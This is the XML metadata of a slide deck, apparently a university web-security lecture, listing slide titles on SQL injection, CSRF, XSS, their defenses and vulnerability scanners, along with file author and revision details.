      <vt:lpstr>Code injection using   system()</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Database queries with PHP</vt:lpstr>
      <vt:lpstr>Basic picture: SQL Injection</vt:lpstr>
      <vt:lpstr>CardSystems Attack</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Example:  buggy login page  (ASP)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr>Even worse</vt:lpstr>
      <vt:lpstr>Even worse …</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>PHP addslashes()</vt:lpstr>
      <vt:lpstr>Parameterized/prepared  SQL</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>OWASP Top Ten              (2013)</vt:lpstr>
      <vt:lpstr>Recall: session using cookies</vt:lpstr>
      <vt:lpstr>Basic picture</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery  (CSRF)</vt:lpstr>
      <vt:lpstr>Form post with cookie</vt:lpstr>
      <vt:lpstr>Cookieless Example:  Home Router</vt:lpstr>
      <vt:lpstr>Attack on Home Router</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referer Validation</vt:lpstr>
      <vt:lpstr>Referer Validation Defense</vt:lpstr>
      <vt:lpstr>Referer Privacy Problems</vt:lpstr>
      <vt:lpstr>Suppression over HTTPS is low</vt:lpstr>
      <vt:lpstr>Custom Header Defense</vt:lpstr>
      <vt:lpstr>Broader view of CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Payments Login CSRF</vt:lpstr>
      <vt:lpstr>Login CSRF</vt:lpstr>
      <vt:lpstr>Sites can redirect browser</vt:lpstr>
      <vt:lpstr>Attack on origin/referer header</vt:lpstr>
      <vt:lpstr>CSRF Recommendations</vt:lpstr>
      <vt:lpstr>Cross Site Scripting  (XSS)</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>XSS example: vulnerable site</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>            2006 Example Vulnerability</vt:lpstr>
      <vt:lpstr>Adobe PDF viewer “feature”</vt:lpstr>
      <vt:lpstr>Here’s how the attack works:</vt:lpstr>
      <vt:lpstr>And if that doesn’t bother you...</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>DOM-based XSS (no server used)</vt:lpstr>
      <vt:lpstr>Defenses at server</vt:lpstr>
      <vt:lpstr>How to Protect Yourself (OWASP)</vt:lpstr>
      <vt:lpstr>Input data validation and filtering</vt:lpstr>
      <vt:lpstr>Output filtering / encoding</vt:lpstr>
      <vt:lpstr>ASP.NET output filtering</vt:lpstr>
      <vt:lpstr>Caution: Scripts not only in &lt;script&gt;!</vt:lpstr>
      <vt:lpstr>Problems with filters</vt:lpstr>
      <vt:lpstr>Pretty good filter</vt:lpstr>
      <vt:lpstr>But watch out for tricky cases</vt:lpstr>
      <vt:lpstr>Advanced anti-XSS tools</vt:lpstr>
      <vt:lpstr>Client-side XSS defenses</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies     IE6 SP1,   FF2.0.0.5</vt:lpstr>
      <vt:lpstr>IE XSS Filter</vt:lpstr>
      <vt:lpstr>Complex problems in social network sites</vt:lpstr>
      <vt:lpstr>Points to remember</vt:lpstr>
      <vt:lpstr>Finding vulnerabilities</vt:lpstr>
      <vt:lpstr>Survey of Web Vulnerability Tools</vt:lpstr>
      <vt:lpstr>Example scanner UI</vt:lpstr>
      <vt:lpstr>Test Vectors By Category</vt:lpstr>
      <vt:lpstr>Detecting Known Vulnerabilities</vt:lpstr>
      <vt:lpstr>Vulnerability Detection</vt:lpstr>
      <vt:lpstr>Secure development</vt:lpstr>
      <vt:lpstr>Experimental Study</vt:lpstr>
      <vt:lpstr>Approach</vt:lpstr>
      <vt:lpstr>Data Collection and Analysis</vt:lpstr>
      <vt:lpstr>Comparison of scanner vulnerability detection</vt:lpstr>
      <vt:lpstr>Developer security self-assessment</vt:lpstr>
      <vt:lpstr>Language usage in sample</vt:lpstr>
      <vt:lpstr>Summary of Results</vt:lpstr>
      <vt:lpstr>Additional solutions</vt:lpstr>
      <vt:lpstr>Web Application Firewalls</vt:lpstr>
      <vt:lpstr>Code checking</vt:lpstr>
      <vt:lpstr>Summary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Suman Jana</cp:lastModifiedBy>
  <cp:revision>6757</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-03-22T18:57:01Z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